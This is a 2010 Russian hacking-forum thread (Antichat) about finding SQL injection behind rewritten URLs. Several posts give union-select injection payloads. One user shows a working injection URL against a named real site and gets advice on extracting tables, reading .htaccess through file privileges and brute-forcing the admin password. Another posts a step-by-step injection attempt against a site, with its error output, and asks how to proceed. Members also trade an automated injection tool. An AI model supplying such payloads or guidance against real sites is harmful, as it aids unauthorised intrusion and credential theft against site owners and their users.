ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12671  
Старый 22.04.2010, 17:18
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Konqi  
я здесь параметров не вижу

даже если будет

http://site.com/news/news567.php
Ты огорчил весь античат.
567 этo GET запрос какого то параметра.
http://site.com/news/news123456+union+select+1,2,3,4.php
// Привет ЧПУ
 
Ответить с цитированием

  #12672  
Старый 22.04.2010, 17:23
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ctacok  
Ты огорчил весь античат.
567 этo GET запрос какого то параметра.
http://site.com/news/news123456+union+select+1,2,3,4.php
// Привет ЧПУ
a с чего взял что это GET ?

может просто имя news567
 
Ответить с цитированием

  #12673  
Старый 22.04.2010, 17:23
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Цитата:
Вопрос наверное риторический. Наверное многим попадались сайты, где скажем ссылки типа http://site.com/news/news567.html.... Такое чувство, что включен mod rewrite, а не статические страницы. Можно ли здесь найти sql-инъекцию например?
apache mod_rewrite

В некоторых случаях, СКЛ инъекция возможна даже в параметре, который преобразуется методами mod_rewrite модуля apache, к GET параметру скрипта.

Например, скрипты типа /news/127.html преобразуются к /news/news.php?id=127 следующим правилом: RewriteRule ^/news/(.*)\.html$ "/news/news.php?id=$1"

Это позволит передать злонамеренные значения параметра скрипту. Так, например /news/128-1.html

Если выводятся подробные сообщения об ошибках, то можно сразу узнать адрес скрипа, и далее, подобрав параметр работать уже с ним. Если же нет, то можно исследовать уязвимость, прямо редактируя имя файла.

ссылка на источник http://www.securitylab.ru/contest/212083.php
 
Ответить с цитированием

  #12674  
Старый 22.04.2010, 18:12
Аватар для InfectedM
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме:
310791

Репутация: 6
Отправить сообщение для InfectedM с помощью ICQ
По умолчанию

Видел давно прогу ,каторая помогает в sql-inj -подбирает поля,кол-во столбцов, может кто скинуть?
 
Ответить с цитированием

  #12675  
Старый 22.04.2010, 18:21
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

SIPT
 
Ответить с цитированием

  #12676  
Старый 22.04.2010, 18:25
Аватар для -=ASSKAKO=-
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме:
1128838

Репутация: 36
По умолчанию

Через скулю получил таблицу и имена колонок, но когда делаю:
Код:
select username from userstable - выдает ошибку
а при
Код:
select somesolumn from othertable - все нормально
помогите раскрутить. также доступна читалка файлов\каталогов.
Код:
http://www.solvex.ru/countries/israel/news/?id=48+and+1=2+union+select+version(),2,3--
 
Ответить с цитированием

  #12677  
Старый 22.04.2010, 18:33
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

unhex(hex()) или же
select username from твоябд.userstable
Всякая проблема может быть
 
Ответить с цитированием

  #12678  
Старый 22.04.2010, 18:45
Аватар для -=ASSKAKO=-
-=ASSKAKO=-
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме:
1128838

Репутация: 36
По умолчанию

забыл добавить, это пробовал.
либо плохо пробовал)
не получлось(
 
Ответить с цитированием

  #12679  
Старый 22.04.2010, 18:51
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от -=ASSKAKO=-  
Через скулю получил таблицу и имена колонок, но когда делаю:
Код:
select username from userstable - выдает ошибку
а при
Код:
select somesolumn from othertable - все нормально
помогите раскрутить. также доступна читалка файлов\каталогов.
Код:
http://www.solvex.ru/countries/israel/news/?id=48+and+1=2+union+select+version(),2,3--
Админку защищает basic авторизация, может и нет никакой таблицы пользователей.
+ Это mysql на FreeBSD с file_priv.
Можно найти .htaccess и попробовать сбрутить пасс
 
Ответить с цитированием

  #12680  
Старый 22.04.2010, 19:29
Аватар для InfectedM
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме:
310791

Репутация: 6
Отправить сообщение для InfectedM с помощью ICQ
По умолчанию

PHP код:
http://www.qwerty.ru/page.php?id=-999' 
-> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-999''' at line 1
PHP код:
http://www.qwerty.ru/page.php?id=1 order by 50 
-> ошибка - :Unknown column '50' in 'order clause'
PHP код:
http://www.qwerty.ru/page.php?id=1 order by 2 
-> ошибка - :Unknown column '2' in 'order clause'
PHP код:
http://www.qwerty.ru/page.php?id=1 order by 1 
-> Грузится норм сайт...
Получается всего 1 столбец ? 0o
PHP код:
http://www.qwerty.ru/page.php?id=1'+union+select+0/* 
-> ошибка - :The used SELECT statements have a different number of columns
PHP код:
http://www.qwerty.ru/page.php?id=-1+union+select+0 */ 
--> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/ AND poz=1' at line 1


подскажите плз что можно сделать?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ